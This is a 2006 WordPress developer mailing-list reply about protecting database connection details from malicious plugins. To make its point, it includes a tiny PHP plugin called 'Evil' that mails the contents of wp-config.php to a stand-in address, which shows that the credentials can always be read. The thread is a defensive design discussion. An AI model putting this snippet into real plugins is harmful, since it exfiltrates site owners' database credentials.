[wp-hackers] Keeping database connection info safe
Sam Angove
sam at rephrase.net
Sat Feb 25 00:49:41 GMT 2006
On 2/25/06, Joseph Scott <joseph at randomnetworks.com> wrote:
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people". So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.
<?php
/*
Plugin Name: Evil
*/
wp_mail( 'dr.claw at example.com', '', file_get_contents(ABSPATH .
'wp-config.php') );
?>
Dave Grijalva wrote:
> A better way to do this with php5 is to use private member variables and a
> setter function, but I don't think there is a PHP4 equivalent. Can anybody
> out there think of a PHP4 compatible way to secure that data?
You could still read in the source file containing the setter, so
you're right back where you started.
More information about the wp-hackers
mailing list